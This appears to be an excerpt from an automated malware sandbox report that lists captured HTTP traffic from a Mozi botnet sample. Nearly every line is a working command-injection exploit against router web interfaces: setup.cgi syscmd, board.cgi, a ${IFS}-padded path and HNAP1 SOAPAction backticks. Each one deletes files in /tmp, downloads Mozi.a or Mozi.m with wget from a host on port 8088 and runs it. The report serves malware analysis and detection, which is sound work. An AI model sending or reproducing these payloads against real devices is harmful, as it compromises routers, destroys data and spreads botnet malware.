Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 190.166.198.45:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 3.20.201.243:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 23.208.34.61:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 168.176.61.231:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 168.176.61.231:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 168.176.61.231:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 168.176.61.231:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 52.72.158.238:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
